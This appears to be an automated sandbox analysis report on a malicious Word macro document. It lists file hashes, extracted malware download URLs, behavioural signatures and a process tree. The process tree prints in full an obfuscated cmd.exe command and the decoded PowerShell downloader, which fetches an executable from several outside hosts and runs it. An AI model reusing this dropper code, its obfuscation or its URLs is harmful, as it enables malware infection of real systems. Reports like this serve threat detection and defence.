Analysis
-
max time kernel
112s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-06-2024 11:04
Behavioral task
behavioral1
Sample
a956aee514439ad6c13b3566e7531133_JaffaCakes118.doc
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
a956aee514439ad6c13b3566e7531133_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
a956aee514439ad6c13b3566e7531133_JaffaCakes118.doc
-
Size
143KB
-
MD5
a956aee514439ad6c13b3566e7531133
-
SHA1
8d1cad846688110bc0bdd8129bc39d5685bb3697
-
SHA256
c62f02ac392d005e396bf0bdf4d7eed9c2ce49183d1fe4c694c13cbe7201eaa0
-
SHA512
f2ce8c2fde9c727b35540fc71c09f19228e8e158ffdf46529bd31b8f8276ba2f3f4e2854145cabdf108ec5b0435bee7cbfeb81a0770c7eeaee98a9e30f64de15
-
SSDEEP
3072:VN8GhDS0o9zTGOZD6EbzCdn+0Bkbj1Q3:VHoUOZDlben+0Kbp
Malware Config
Extracted
http://www.forma-31.ru/x9w0Q_aJ9eUDi_0
http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM
http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v
http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q
http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2432 856 cmd.exe WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 856 WINWORD.EXE 856 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3192 powershell.exe 3192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3192 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 856 WINWORD.EXE 856 WINWORD.EXE 856 WINWORD.EXE 856 WINWORD.EXE 856 WINWORD.EXE 856 WINWORD.EXE 856 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exedescription pid process target process PID 856 wrote to memory of 4964 856 WINWORD.EXE splwow64.exe PID 856 wrote to memory of 4964 856 WINWORD.EXE splwow64.exe PID 856 wrote to memory of 2432 856 WINWORD.EXE cmd.exe PID 856 wrote to memory of 2432 856 WINWORD.EXE cmd.exe PID 2432 wrote to memory of 2800 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2800 2432 cmd.exe cmd.exe PID 2800 wrote to memory of 1764 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 1764 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 2880 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 2880 2800 cmd.exe cmd.exe PID 2880 wrote to memory of 3192 2880 cmd.exe powershell.exe PID 2880 wrote to memory of 3192 2880 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a956aee514439ad6c13b3566e7531133_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:4964
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c %PRoGRAMDATa:~0,1%%PRogRAMData:~9,2% /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\cmd.exeCmD /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "3⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO %Kq%"4⤵PID:1764
-
C:\Windows\system32\cmd.execmD.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Tastytk='CheckingAccountdp';$ErgonomicWoodenTowelsjr=new-object Net.WebClient;$Rubberhb='http://www.forma-31.ru/x9w0Q_aJ9eUDi_0@http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM@http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v@http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q@http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd'.Split('@');$IntelligentCottonChipsvv='SleekCottonShirtdj';$ComputersBooksdl = '185';$hapticml='Berkshirejc';$deployww=$env:public+'\'+$ComputersBooksdl+'.exe';foreach($arrayaw in $Rubberhb){try{$ErgonomicWoodenTowelsjr.DownloadFile($arrayaw, $deployww);$depositvm='Metaljk';If ((Get-Item $deployww).length -ge 80000) {Invoke-Item $deployww;$Texastw='Fullyconfigurablenr';break;}}catch{}}$limekr='Computerswj';5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
494B
MD50b363b41b280dbe608a0277f86621199
SHA1403782c4c212326e1b4db926383a159396905b3d
SHA25636800b16fa23b85ad5e6ea91beb787dde9c7b7ed2fbf61e5582ca492c6407b07
SHA512a970cc88b7f881307839b9fa4cae6914339be2d9b0d560bd9fa6cc5ea80c6eacc24ee0663652dcff5d7193b549e18b2f2079dfa7b1571165baaf7422134e7af3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82